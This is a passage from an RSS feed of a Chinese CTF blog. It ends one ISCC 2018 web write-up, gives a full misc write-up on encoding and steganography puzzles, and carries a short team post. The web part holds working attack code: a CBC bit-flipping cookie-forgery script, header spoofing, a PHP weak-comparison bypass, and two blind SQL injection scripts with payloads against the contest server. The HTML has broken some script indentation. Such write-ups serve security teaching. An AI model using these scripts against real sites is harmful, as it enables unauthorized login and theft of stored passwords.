cipher=base64.b64decode(urllib.unquote("uA900LR7DpuWKx7K5GyvwtBhhc4Q9OVGMoXMYfIxo4lw8qgJmlbjELEU%2FeOWSGR31Zyi8BkxJ4knpng7j4sMUQ%3D%3D"))
iv=base64.b64decode(urllib.unquote("9qcxkpyvwymnvOp49F2Uvg%3D%3D"))
newcipher=cipher[0:13]+chr(ord(cipher[13])^ord('N')^ord('n'))+cipher[14:]
print urllib.quote(base64.b64encode(newcipher))
jiamingwen=base64.b64decode(urllib.unquote('twZ92UO5Kx1ne5hEeGTCum1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjY6IjEyMzQ1NiI7fQ=='))
mingwen = 'a:2:{s:8:"userna'
newiv = ''
for i in range(0,16):
    newiv += chr(ord(mingwen[i])^ord(jiamingwen[i])^ord(iv[i])) 
print urllib.quote(base64.b64encode(newiv))</pre>
<p>&nbsp;</p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">先用admiN 123456登录<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_21.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">在地址栏处回车(不要刷新，否则cipher 和iv会刷新)并用burp抓包。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_22.png" alt="" /><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">将iv 和 cipher放入脚本中 得到新的 cipher 修改cookie中的 cipher 得到报错信息中的 cipher。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_23.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_24.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_25.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 复制报错信息中的cipher到脚本中 运行得到新的iv  修改iv为新的iv 且cipher为第一次脚本运行得到的cipher。得到flag；<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_26.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 18pt;"> 为什么这么简单啊</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_27.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">根据提示利用 xff ip地址伪造和referer 即可进入第二关。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_28.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_29.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 右键查看源码，发现可疑js文件，浏览找到密码 base64解码 提交得到flag。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_30.png" alt="" /><br />
</span></p>
<pre><code><span style="color: black; font-size: 7pt;"><span style="font-family: Courier New;">ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAHAAYQBzAHMAdwBvAHIAZAA6AHgAaQBuAHkAaQBqAGkALgBjAG8AbQAiACkAPAAvAHMAYwByAGkAcAB0AD4
</span><span style="font-family: 宋体;">解码得到</span><span style="font-family: Courier New;">: xinyiji.com
</span></span></code></pre>
<p><img src="/wp-content/uploads/2018/05/052518_1206_31.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">php是世界上最好的语言<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_32.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">用户名随便输 ，密码用php弱类型进行绕过 :QNKCDZO（<a href="/ctf/222/">可以看我之前写过的php知识点总结）</a><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 点击得到<img src="/wp-content/uploads/2018/05/052518_1206_33.png" alt="" /><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_34.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">利用全局变量打印出$flag变量即可。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_35.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">Sqli<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">题目说的很明确 就是注入了。经过测试发现是盲注 于是写了个脚本跑出密码登录。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_36.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_37.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">解密: u4g009<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_38.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">提示在另一个字段，(真他妈坑啊)，这里直接联合查询注入就可以了。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_39.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">顺便附上我写的垃圾盲注脚本</span></p>
<pre class="lang:default decode:true ">import requests
tname = ''
						
pwd = ''
						
url = 'http://118.190.152.202:8011/index.php'
						
payload = "admin' and ascii(substr(({s}),{m},1))={n}#"
						
fuzz = ('0123456789,abcdefghijklmnopqrstuvwxyz')
# for i in range(1,10):
#     for k in fuzz:
#         p = payload.format(s='select group_concat(table_name) from information_schema.tables where table_schema = database()',m=i,n=ord(k))
#         u = requests.post(url,data = {'username':p,'password':'admin'})
#         if 'normal' in u.content:
#             tname += k
#             print tname
#             break
					
for i in range(1,33):

					for k in fuzz:
        p = payload.format(s="select group_concat(pass) from user",m=i,n=ord(k))
        u = requests.post(url,data = {'username':p,'password':'admin'})

					if
							'normal'
									in u.content:
            pwd += k

					print pwd

						break</pre>
<p>&nbsp;</p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">有种你来绕<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_40.png" alt="" /><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">根据提示，是mysql的数据库，利用mysql的特性&#8211;隐式类型转换，进行盲注得到密码。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_41.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">写了个脚本跑出密码登录。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_42.png" alt="" /></p>
<pre class="lang:default decode:true ">import requests
url = "http://118.190.152.202:8019/login.php"
						
payload = "1'-(ascii(mid((passwd)from({0})))={1})-'"
						
password = ''
						
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789'
						
for i in range(1,33):

					for k in fuzz:
        p = payload.format(i,ord(k))
        u = requests.post(url,data = {'uname':p,'passwd':'admin'})

					if
							not
									'username'
											in u.content:
            password += k

						print password</pre>
<p>&nbsp;</p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 解密: nishishabi1438  (我他妈想打死傻逼出题人)<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_43.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">输入flag，执行即可。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_44.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">web400 Only Admin 是cookie注入，但是自己没怎么看，等其他师傅分享wp再学习一波吧。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> </span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>ISCC 2018 Msic WriteUp</title>
		<link>/ctf/422.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 25 May 2018 11:50:45 +0000</pubDate>
				<category><![CDATA[CTF笔记]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[iscc2018]]></category>
		<category><![CDATA[msic]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=266</guid>

					<description><![CDATA[X1r0z:你们 520 在撩妹 而我却在做题 What is that? png 格式 应该是手指下面有 flag 拖进 tweakpng CRC 报错 可能更改了图片宽度 or...]]></description>
										<content:encoded><![CDATA[<p>X1r0z:你们 520 在撩妹 而我却在做题</p>
<h2 id="what-is-that">What is that?</h2>
<p><a href="/wp-content/uploads/2018/05/1527078386.jpg"><img loading="lazy" class="alignnone size-full wp-image-267" src="/wp-content/uploads/2018/05/1527078386.jpg" alt="" width="600" height="491" /></a></p>
<p>png 格式 应该是手指下面有 flag</p>
<p>拖进 tweakpng</p>
<p><a href="/wp-content/uploads/2018/05/1527078387.jpg"><img loading="lazy" class="alignnone size-full wp-image-268" src="/wp-content/uploads/2018/05/1527078387.jpg" alt="" width="438" height="169" /></a></p>
<p>CRC 报错 可能更改了图片宽度 or 高度</p>
<p>winhex 修改</p>
<p><a href="/wp-content/uploads/2018/05/1527078388.jpg"><img loading="lazy" class="alignnone size-full wp-image-269" src="/wp-content/uploads/2018/05/1527078388.jpg" alt="" width="378" height="58" /></a></p>
<p>查看</p>
<p><a href="/wp-content/uploads/2018/05/1527078390.jpg"><img loading="lazy" class="alignnone size-full wp-image-270" src="/wp-content/uploads/2018/05/1527078390.jpg" alt="" width="532" height="77" /></a></p>
<h2 id="数字密文">数字密文</h2>
<p><code class="highlighter-rouge">69742773206561737921</code></p>
<p>hex 编码 解码即可</p>
<p><code class="highlighter-rouge">it's easy!</code></p>
<h2 id="秘密电报">秘密电报</h2>
<p><code class="highlighter-rouge">ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA</code></p>
<p>培根密码</p>
<p><code class="highlighter-rouge">ilikeiscc</code></p>
<p>提交注意大写</p>
<h2 id="重重谍影">重重谍影</h2>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZqRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==
</code></pre>
</div>
</div>
<p>base64 一直解</p>
<p>注意 url 编码</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4
B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z
iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=
</code></pre>
</div>
</div>
<p>AES key 为空</p>
<p><code class="highlighter-rouge">缽娑遠呐者若奢顛悉呐集梵提梵蒙夢怯倒耶哆般究有栗</code></p>
<p><a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">tudoucode</a></p>
<p>解密</p>
<p><code class="highlighter-rouge">把我复制走</code></p>
<h2 id="有趣的-iscc">有趣的 ISCC</h2>
<p><a href="/wp-content/uploads/2018/05/1527078391.jpg"><img loading="lazy" class="alignnone size-full wp-image-271" src="/wp-content/uploads/2018/05/1527078391.jpg" alt="" width="648" height="657" /></a></p>
<p>winhex 末尾</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#54;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#99;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#49;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#55;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#98;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#57;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#50;&amp;#48;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#57;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#51;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#50;&amp;#48;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#54;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#53;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#54;&amp;#101;&amp;#92;&amp;#117;&amp;#48;&amp;#48;&amp;#55;&amp;#100;
</code></pre>
</div>
</div>
<p>unicode 解码</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d
</code></pre>
</div>
</div>
<p>再解一次</p>
<p><code class="highlighter-rouge">flag{iscc is fun}</code></p>
<h2 id="where-is-the-flag">Where is the FLAG?</h2>
<p><a href="/wp-content/uploads/2018/05/1527078393.jpg"><img loading="lazy" class="alignnone size-full wp-image-272" src="/wp-content/uploads/2018/05/1527078393.jpg" alt="" width="267" height="264" /></a></p>
<p>拖进 tweakpng 看到 Adobe Photoshop</p>
<p>打开后拼接图层</p>
<p><a href="/wp-content/uploads/2018/05/1527078394.jpg"><img loading="lazy" class="alignnone size-full wp-image-273" src="/wp-content/uploads/2018/05/1527078394.jpg" alt="" width="390" height="391" /></a></p>
<p>扫描即可得到 flag</p>
<h2 id="凯撒十三世">凯撒十三世</h2>
<p><code class="highlighter-rouge">ebdgc697g95w3</code></p>
<p>13 次移位</p>
<p><code class="highlighter-rouge">roqtp697t95j3</code></p>
<p>提交发现不对 后来想想 flag 开头应该是 flag{} 之类的</p>
<p><code class="highlighter-rouge">r -&gt; f o -&gt; l q -&gt; a t -&gt; g</code></p>
<p>以此类推</p>
<p><code class="highlighter-rouge">flag:yougotme</code></p>
<h2 id="一只猫的心思">一只猫的心思</h2>
<p><a href="/wp-content/uploads/2018/05/1527078395.jpg"><img loading="lazy" class="alignnone size-full wp-image-274" src="/wp-content/uploads/2018/05/1527078395.jpg" alt="" width="726" height="687" /></a></p>
<p>foremost 分离出 doc</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通
</code></pre>
</div>
</div>
<p>拿之前的网址解密</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46
</code></pre>
</div>
</div>
<p>hex</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>R1VaREdNSlVHVTNVQ05KU0dRMlRNTkJVSVUyVEdOU0RHWTJESU9CVkdJMlRNTlpRR1UyVEtOSlRHQVpUS05DREdVWkRHTUJXR1EyVUNOQ0ZHUTNES01SVkdBMlRJTkpXRzRZREtOWlZHTTJUTU5TQ0c0NFRLTVJVR1kyRUtOQ0ZHVTNUTVFaVklFMkRRTkpYR1UzRE9NQlZHVTJUSU5KVkdNWVRNTUpWR1kzRUVOU0RHVkFUSVJCV0lNMlRNTkJVR1UyRE1RUlVJVTJEUU5KU0dNWVRPTUJVR00yVE1OQlZHWTJES01CVkdFM0VHTktCR1JBVEtOWlZHUTJFQ05CVkdVMkRHTUJUR0UzRENOSldHUTJUTU5CVkdZMkVJTlNDR1VaRElRWlZHUTJUS05DQkdVMlRLTVJUR0EyRE1OUlJHVTNESU5KVUlVMkVNTkpSR01ZREtRSlVIQTJUTU5KVUdSQVRJTVJWR0EyVElNWlFHTTRUS01CVkdFWlVJTTJF
</code></pre>
</div>
</div>
<p>base64</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E
</code></pre>
</div>
</div>
<p>base32</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D
</code></pre>
</div>
</div>
<p>hex</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==
</code></pre>
</div>
</div>
<p>base64</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====
</code></pre>
</div>
</div>
<p>base32</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>463161395F69735F493563635F5A4F6C385F4733545030314E54
</code></pre>
</div>
</div>
<p>hex</p>
<p><code class="highlighter-rouge">F1a9_is_I5cc_ZOl8_G3TP01NT</code></p>
<h2 id="暴力xx不可取">暴力XX不可取</h2>
<p>zip 文件 猜测为伪加密</p>
<p>ZipCenOp.jar</p>
<p>解压后打开 flag.txt</p>
<p><code class="highlighter-rouge">vfppjrnerpbzvat</code></p>
<p>凯撒移位 每一对都试一遍</p>
<p><code class="highlighter-rouge">isccwearecoming</code></p>
<p>13 次移位</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>2018-05-11 CTF核心审核题源代码及成员Writeup</title>
		<link>/ctf/414.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 15 May 2018 13:40:48 +0000</pubDate>
				<category><![CDATA[CTF笔记]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=357</guid>

					<description><![CDATA[换血成功！ 经过4天的时间，终于结束了核心入门审核，回头看我们出的CTF题目http://118.126.113.78/ web1 by ur10ser 这道题放出了就被秒了，然后...]]></description>
										<content:encoded><![CDATA[<blockquote><p>换血成功！<br />
经过4天的时间，终于结束了核心入门审核，回头看我们出的<span class="wpcom_tag_link"><a href="/tags/ctf" title="CTF" target="_blank">CTF</a></span>题目<a href="http://118.126.113.78/">http://118.126.113.78/</a></p></blockquote>
<h1>web1 by ur10ser</h1>
<p>这道题放出了就被秒了，然后发现忘记了调用一个过滤函数#(内伤)蜜汁尴尬</p>
<p>考点:php伪协议和盲注</p>
<p>具体的解题过程看这里<a href="https://pan.chabug.org/CTF/2018-05-11CTF%E6%A0%B8%E5%BF%83%E9%A2%98/%E6%88%90%E5%91%98%E8%A7%A3%E9%A2%98Writeup/">成员解题Writeup</a></p>
<h1>web2 by X1r0z</h1>
<p>解题过程看<a href="https://pan.chabug.org/CTF/2018-05-11CTF%E6%A0%B8%E5%BF%83%E9%A2%98/%E6%88%90%E5%91%98%E8%A7%A3%E9%A2%98Writeup/">X1r0z的writeup</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
